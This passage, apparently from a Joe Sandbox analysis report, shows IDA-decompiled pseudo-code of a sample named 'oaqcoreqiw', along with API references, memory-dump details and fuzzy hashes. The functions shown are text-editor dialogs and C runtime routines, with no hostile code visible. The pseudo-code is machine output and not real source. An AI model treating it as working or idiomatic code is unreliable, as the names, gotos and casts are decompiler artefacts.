					return _t23;
				}
				return _t19;
			}








                                                  0x010a2363
                                                  0x010a2365
                                                  0x010a236f
                                                  0x010a237b
                                                  0x010a2382
                                                  0x010a2389
                                                  0x010a2390
                                                  0x010a2398
                                                  0x010a239b
                                                  0x010a23b0
                                                  0x010a23c5
                                                  0x010a23d5
                                                  0x010a23dd
                                                  0x010a23e0
                                                  0x010a23e0
                                                  0x00000000
                                                  0x010a23e6
                                                  0x010a23ec

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Font$ChooseCreateDeleteIndirectMessageObjectSend_memset
                                                  • String ID: <$A
                                                  • API String ID: 3794199884-570643782
                                                  • Opcode ID: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction ID: 7a29cddd51ea12a122c8cdcb81fdf194d50a3233dbb07d826403b7cab9581bec
                                                  • Opcode Fuzzy Hash: 0f4cab98a615f8ffe87abf63c39f860482ae95880a463a2024feb54f57c1e1ef
                                                  • Instruction Fuzzy Hash: F71173729202099BEB609FA4ECC4BCE77B8F709704F004065F68DAB245DB765549CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A27B0 Relevance: 10.6, APIs: 7, Instructions: 54windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A27B0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t15;

				_t8 = _a8 - 0x110;
				if(_t8 == 0) {
					SetDlgItemInt(_a4, 0x194, SendMessageW( *0x10c3f2c, 0xc9, 0xffffffff, 0) + 1, 0);
					goto L7;
				} else {
					if(_t8 != 1) {
						L7:
						return 0;
					} else {
						_t15 = _a12 - 1;
						if(_t15 == 0) {
							SendMessageW( *0x10c3f2c, 0xb1, SendMessageW( *0x10c3f2c, 0xbb, GetDlgItemInt(_a4, 0x194, 0, 0) - 1, 0), _t18);
							EndDialog(_a4, 1);
							return 1;
						} else {
							if(_t15 != 1) {
								goto L7;
							} else {
								EndDialog(_a4, 2);
								return 1;
							}
						}
					}
				}
			}





                                                  0x010a27b6
                                                  0x010a27bb
                                                  0x010a2854
                                                  0x00000000
                                                  0x010a27bd
                                                  0x010a27be
                                                  0x010a285a
                                                  0x010a285d
                                                  0x010a27c4
                                                  0x010a27c7
                                                  0x010a27c8
                                                  0x010a2819
                                                  0x010a2824
                                                  0x010a2830
                                                  0x010a27ca
                                                  0x010a27cb
                                                  0x00000000
                                                  0x010a27d1
                                                  0x010a27d6
                                                  0x010a27e2
                                                  0x010a27e2
                                                  0x010a27cb
                                                  0x010a27c8
                                                  0x010a27be

                                                  APIs
                                                  • EndDialog.USER32(?,00000002), ref: 010A27D6
                                                  • GetDlgItemInt.USER32(?,00000194,00000000,00000000), ref: 010A27F1
                                                  • SendMessageW.USER32(000000BB,-00000001,00000000), ref: 010A2806
                                                  • SendMessageW.USER32(000000B1,00000000,00000000), ref: 010A2819
                                                  • EndDialog.USER32(?,00000001), ref: 010A2824
                                                  • SendMessageW.USER32(000000C9,000000FF,00000000), ref: 010A2842
                                                  • SetDlgItemInt.USER32(?,00000194,00000001,00000000), ref: 010A2854
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DialogItem
                                                  • String ID:
                                                  • API String ID: 3626491743-0
                                                  • Opcode ID: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction ID: e6c11a7046e927d2f13821a542ba69f3963b244d109982ba229e30fd1d703c91
                                                  • Opcode Fuzzy Hash: 192abd57bf00c6b233b02b5073f0d2b5b0900823f5a0bbaa51812e98e0b5d146
                                                  • Instruction Fuzzy Hash: AE014C31290209BFFB315BA4ED99FA63B64F708700F508421FAD9D81E4C7BB98619B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B6054 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E010B6054(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t11;
				intOrPtr* _t17;
				intOrPtr* _t31;
				void* _t32;

				_push(8);
				_push(0x10bf568);
				_t11 = E010A61F0(__ebx, __edi, __esi);
				_t31 =  *((intOrPtr*)(_t32 + 8));
				if(_t31 != 0) {
					E010A8834(0xd);
					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10c19f8) {
						E010A8C4B( *(_t31 + 4));
					}
					 *(_t32 - 4) = 0xfffffffe;
					E010B6664();
					if( *_t31 != 0) {
						E010A8834(0xc);
						 *(_t32 - 4) = 1;
						E010AEB5D( *_t31);
						_t17 =  *_t31;
						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x10c1da0) {
							E010AEA03(_t17);
						}
						 *(_t32 - 4) = 0xfffffffe;
						E010B6670();
					}
					_t11 = E010A8C4B(_t31);
				}
				return E010A6235(_t11);
			}







                                                  0x010b65bf
                                                  0x010b65c1
                                                  0x010b65c6
                                                  0x010b65cb
                                                  0x010b65d0
                                                  0x010b65d8
                                                  0x010b65de
                                                  0x010b65e6
                                                  0x010b6601
                                                  0x010b6606
                                                  0x010b6607
                                                  0x010b660e
                                                  0x010b6616
                                                  0x010b661a
                                                  0x010b6620
                                                  0x010b6629
                                                  0x010b662f
                                                  0x010b6633
                                                  0x010b6642
                                                  0x010b6647
                                                  0x010b6648
                                                  0x010b664f
                                                  0x010b664f
                                                  0x010b6655
                                                  0x010b665a
                                                  0x010b6660

                                                  APIs
                                                  • __lock.LIBCMT ref: 010B65D8
                                                    • Part of subcall function 010A8834: __mtinitlocknum.LIBCMT ref: 010A8846
                                                    • Part of subcall function 010A8834: __amsg_exit.LIBCMT ref: 010A8852
                                                    • Part of subcall function 010A8834: EnterCriticalSection.KERNEL32(00000000,?,010A7AC9,0000000D), ref: 010A885F
                                                  • InterlockedDecrement.KERNEL32(00000000), ref: 010B65EB
                                                  • _free.LIBCMT ref: 010B6601
                                                    • Part of subcall function 010A8C4B: HeapFree.KERNEL32(00000000,00000000,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C5F
                                                    • Part of subcall function 010A8C4B: GetLastError.KERNEL32(010C15B0,?,010A88AB,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A8C71
                                                  • __lock.LIBCMT ref: 010B661A
                                                  • ___removelocaleref.LIBCMT ref: 010B6629
                                                  • ___freetlocinfo.LIBCMT ref: 010B6642
                                                  • _free.LIBCMT ref: 010B6655
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                  • String ID:
                                                  • API String ID: 556454624-0
                                                  • Opcode ID: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction ID: d4aedcfcff14dbf283d9147e3305e122552913258adb3f2100576e80a287de2f
                                                  • Opcode Fuzzy Hash: e43e9eec09588cccf3cd69ce1f076d0fee24672c862f952b1346ed72aa618dc0
                                                  • Instruction Fuzzy Hash: 6601F531402302E6EB787FA8D9887DD7BE0AF24B12F5485AEE1D5AA0D0CF3685C0CE15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A7B33 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 91%
                                                  			E010A7B33(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E010A461A(_t3);
				if(E010A8983() != 0) {
					_t6 = E010A80A2(_t5, E010A7893);
					 *0x10c15a0 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E010A8C83(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E010A7BA9();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E010A80CC(_t9,  *0x10c15a0, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E010A7A87(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E010A7BA9();
					return 0;
				}
			}








                                                  0x010a7b33
                                                  0x010a7b3f
                                                  0x010a7b4e
                                                  0x010a7b54
                                                  0x010a7b59
                                                  0x010a7b5c
                                                  0x00000000
                                                  0x010a7b5e
                                                  0x010a7b6b
                                                  0x010a7b6f
                                                  0x010a7b71
                                                  0x010a7ba0
                                                  0x010a7ba0
                                                  0x010a7ba5
                                                  0x010a7ba8
                                                  0x010a7b73
                                                  0x010a7b81
                                                  0x010a7b83
                                                  0x00000000
                                                  0x010a7b85
                                                  0x010a7b85
                                                  0x010a7b87
                                                  0x010a7b88
                                                  0x010a7b8f
                                                  0x010a7b95
                                                  0x010a7b99
                                                  0x010a7b9d
                                                  0x010a7b9f
                                                  0x010a7b9f
                                                  0x010a7b83
                                                  0x010a7b71
                                                  0x010a7b41
                                                  0x010a7b41
                                                  0x010a7b41
                                                  0x010a7b48
                                                  0x010a7b48

                                                  APIs
                                                  • __init_pointers.LIBCMT ref: 010A7B33
                                                    • Part of subcall function 010A461A: EncodePointer.KERNEL32(00000000,?,010A7B38,010A3D79,010BEFC0,00000014), ref: 010A461D
                                                    • Part of subcall function 010A461A: __initp_misc_winsig.LIBCMT ref: 010A463E
                                                  • __mtinitlocks.LIBCMT ref: 010A7B38
                                                    • Part of subcall function 010A8983: InitializeCriticalSectionAndSpinCount.KERNEL32(010C15B0,00000FA0,?,?,010A7B3D,010A3D79,010BEFC0,00000014), ref: 010A89A1
                                                  • __mtterm.LIBCMT ref: 010A7B41
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A889F
                                                    • Part of subcall function 010A7BA9: _free.LIBCMT ref: 010A88A6
                                                    • Part of subcall function 010A7BA9: DeleteCriticalSection.KERNEL32(010C15B0,?,?,010A7B46,010A3D79,010BEFC0,00000014), ref: 010A88C8
                                                  • __calloc_crt.LIBCMT ref: 010A7B66
                                                  • __initptd.LIBCMT ref: 010A7B88
                                                  • GetCurrentThreadId.KERNEL32 ref: 010A7B8F
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                  • String ID:
                                                  • API String ID: 757573777-0
                                                  • Opcode ID: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction ID: 7eb80ed30f49d0daac90950ce86de811a83d6e2ce3fd4cbae2d4194d1fdabfb5
                                                  • Opcode Fuzzy Hash: 025d25f0c581429ca6b87fbd81f447f17dbc83f46b66f13f370568a70b2997fd
                                                  • Instruction Fuzzy Hash: 23F0F6725A93135EE2743BF8BC02BDA76C48F212B2F98CB2AE2E0D50C0FF2280008540
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A16A0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E010A16A0() {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				int _t24;

				E010A66E0( &_v92, 0, 0x58);
				lstrcpyW( &_v612, L"*.txt");
				_v88 =  *0x10c3f24;
				_v84 =  *0x10c3f20;
				_v64 =  &_v612;
				_v92 = 0x58;
				_v80 = 0x10c47c4;
				_v60 = 0;
				_v40 = 0x881864;
				_v24 = E010A15A0;
				_v20 = 0x190;
				_v32 = L"txt";
				 *0x10c4c88 = 0;
				 *0x10c4c8c = 1;
				_t24 = GetOpenFileNameW( &_v92);
				if(_t24 != 0) {
					return E010A1140(_v64,  *0x10c4c88);
				}
				return _t24;
			}















                                                  0x010a16b1
                                                  0x010a16c5
                                                  0x010a16d0
                                                  0x010a16d8
                                                  0x010a16e1
                                                  0x010a16e8
                                                  0x010a16ef
                                                  0x010a16f6
                                                  0x010a16fd
                                                  0x010a1704
                                                  0x010a170b
                                                  0x010a1712
                                                  0x010a1719
                                                  0x010a1723
                                                  0x010a172d
                                                  0x010a1735
                                                  0x00000000
                                                  0x010a1740
                                                  0x010a1748

                                                  APIs
                                                  • _memset.LIBCMT ref: 010A16B1
                                                  • lstrcpyW.KERNEL32 ref: 010A16C5
                                                  • GetOpenFileNameW.COMDLG32(?), ref: 010A172D
                                                    • Part of subcall function 010A1140: GetWindowTextLengthW.USER32 ref: 010A1153
                                                    • Part of subcall function 010A1140: SendMessageW.USER32(000000B8,00000000,00000000), ref: 010A116A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileLengthMessageNameOpenSendTextWindow_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 4227841899-3431318540
                                                  • Opcode ID: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction ID: 92d52003eed7d8680851fe337cb19797e5aff78e477e03f560248714daebb773
                                                  • Opcode Fuzzy Hash: 5dc893bb8c064c253e2b105d05943876078c68cb539fb3f0444907ee781754f6
                                                  • Instruction Fuzzy Hash: 891117B4D0024C9FDB10DFE4E888BDEBBF8BB08304F004119E594AB284EBBA5548CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010A1770 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E010A1770() {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v60;
				WCHAR* _v64;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				struct tagOFNA _v92;
				short _v612;
				signed int _t24;

				E010A66E0( &_v92, 0, 0x58);
				lstrcpyW( &_v612, L"*.txt");
				_v88 =  *0x10c3f24;
				_v84 =  *0x10c3f20;
				_v64 =  &_v612;
				 *0x10c4c88 =  *0x10c47c0;
				_v92 = 0x58;
				_v80 = 0x10c47c4;
				_v60 = 0;
				_v40 = 0x880866;
				_v24 = E010A15A0;
				_v20 = 0x190;
				_v32 = L"txt";
				 *0x10c4c8c = 0;
				_t24 = GetSaveFileNameW( &_v92);
				asm("sbb eax, eax");
				return  ~( ~_t24);
			}















                                                  0x010a1781
                                                  0x010a1795
                                                  0x010a17a0
                                                  0x010a17a8
                                                  0x010a17b1
                                                  0x010a17b9
                                                  0x010a17c2
                                                  0x010a17c9
                                                  0x010a17d0
                                                  0x010a17d7
                                                  0x010a17de
                                                  0x010a17e5
                                                  0x010a17ec
                                                  0x010a17f3
                                                  0x010a17fd
                                                  0x010a1805
                                                  0x010a180c

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: FileNameSave_memsetlstrcpy
                                                  • String ID: *.txt$X$txt
                                                  • API String ID: 524411262-3431318540
                                                  • Opcode ID: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction ID: 40828d66436edc55ada890cdc79ebb65e4e918d35b8b62dc30c5eb75b4e12477
                                                  • Opcode Fuzzy Hash: 7a003737729edf411a4b1eed1808b735b231ce370be4f56d175e60fe4e29948f
                                                  • Instruction Fuzzy Hash: CF01E9B4D4024D9FDB50DFE4E8897DEBBF8BB08704F004519E495EB284E77A55488F91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010B52E1 Relevance: 9.1, APIs: 6, Instructions: 136COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E010B52E1(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E010A732B(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E010A66B0(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E010A4BEE();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E010AE41E(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E010A4BEE();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E010AE1D7(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E010A9CE9(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10c1560;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10c2de0 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E010A7180(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E010A9CE9(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E010A6117())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E010A6117())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                                                  0x010b52e6
                                                  0x010b52ed
                                                  0x010b52f5
                                                  0x010b52fa
                                                  0x010b5300
                                                  0x010b5303
                                                  0x010b5305
                                                  0x010b5308
                                                  0x010b5317
                                                  0x010b531a
                                                  0x010b5336
                                                  0x010b5338
                                                  0x010b533b
                                                  0x010b5350
                                                  0x010b5356
                                                  0x010b5359
                                                  0x010b535c
                                                  0x010b535f
                                                  0x010b5364
                                                  0x010b5366
                                                  0x010b536e
                                                  0x010b5370
                                                  0x010b537e
                                                  0x010b537f
                                                  0x010b5385
                                                  0x010b5387
                                                  0x00000000
                                                  0x00000000
                                                  0x010b5372
                                                  0x010b5372
                                                  0x010b537a
                                                  0x010b537c
                                                  0x010b5389
                                                  0x010b538a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010b537c
                                                  0x010b5370
                                                  0x010b5390
                                                  0x010b5397
                                                  0x010b5419
                                                  0x010b541d
                                                  0x010b5422
                                                  0x010b5423
                                                  0x010b5424
                                                  0x010b542b
                                                  0x010b5430
                                                  0x010b5436
                                                  0x00000000
                                                  0x010b5399
                                                  0x010b5399
                                                  0x010b53a1
                                                  0x010b53a6
                                                  0x010b53ab
                                                  0x010b53ae
                                                  0x010b53b1
                                                  0x010b53b3
                                                  0x010b53cc
                                                  0x010b53cf
                                                  0x010b53ec
                                                  0x010b53ec
                                                  0x010b53d1
                                                  0x010b53d1
                                                  0x010b53d4
                                                  0x00000000
                                                  0x010b53d6
                                                  0x010b53e3
                                                  0x010b53e3
                                                  0x010b53d4
                                                  0x010b53f1
                                                  0x010b53f5
                                                  0x00000000
                                                  0x010b53f7
                                                  0x010b53f7
                                                  0x010b53f9
                                                  0x010b53fa
                                                  0x010b53fb
                                                  0x010b53fc
                                                  0x010b5406
                                                  0x010b5409
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x010b5409
                                                  0x010b53b5
                                                  0x010b53b5
                                                  0x010b53b6
                                                  0x010b53b7
                                                  0x010b53c0
                                                  0x010b540b
                                                  0x010b540e
                                                  0x010b5411
                                                  0x010b5438
                                                  0x010b5438
                                                  0x010b543b
                                                  0x010b5448
                                                  0x010b543d
                                                  0x010b543d
                                                  0x010b543d
                                                  0x010b543d
                                                  0x010b543d
                                                  0x00000000
                                                  0x010b543d
                                                  0x010b543b
                                                  0x010b53b3
                                                  0x010b533d
                                                  0x010b533d
                                                  0x010b5340
                                                  0x010b5343
                                                  0x010b53c7
                                                  0x010b5441
                                                  0x010b5441
                                                  0x010b5345
                                                  0x010b5348
                                                  0x010b5348
                                                  0x010b534b
                                                  0x010b534d
                                                  0x00000000
                                                  0x010b534d
                                                  0x010b5343
                                                  0x010b531c
                                                  0x010b5321
                                                  0x00000000
                                                  0x010b5321
                                                  0x010b530a
                                                  0x010b530f
                                                  0x010b5327
                                                  0x010b5327
                                                  0x010b532b
                                                  0x010b532b
                                                  0x010b544f
                                                  0x010b52ef
                                                  0x010b52f3
                                                  0x010b52f3

                                                  APIs
                                                  • __ioinit.LIBCMT ref: 010B52E6
                                                    • Part of subcall function 010A732B: InitOnceExecuteOnce.KERNEL32(010C27C0,010A7366,00000000,00000000,010B310F,00000109), ref: 010A7339
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.303816197.00000000010A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010A0000, based on PE: true
                                                  • Associated: 00000002.00000002.303807726.00000000010A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303840310.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303853762.00000000010C1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000002.00000002.303864783.00000000010C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_10a0000_oaqcoreqiw.jbxd
                                                  Similarity
                                                  • API ID: Once$ExecuteInit__ioinit
                                                  • String ID:
                                                  • API String ID: 129814473-0
                                                  • Opcode ID: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction ID: 833a5784a6de25f7adcfdf35e181e58674b31c7d8a2c3740963af601c17df2d7
                                                  • Opcode Fuzzy Hash: 6f40068b42d0fd35b7dba9d2c1691f0779a435e364168624dccffc416a1bef81
                                                  • Instruction Fuzzy Hash: 1241D471601B069BD7249B6CCCC1AEE7BE4AF41324F08C6ADE5E6877D1E7B4E8408B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 010AB4EA Relevance: 9.1, APIs: 6, Instructions: 134COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  C-Code - Quality: 89%
                                                  			E010AB4EA(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E010A732B(_t43);
				if(_t44 >= 0) {
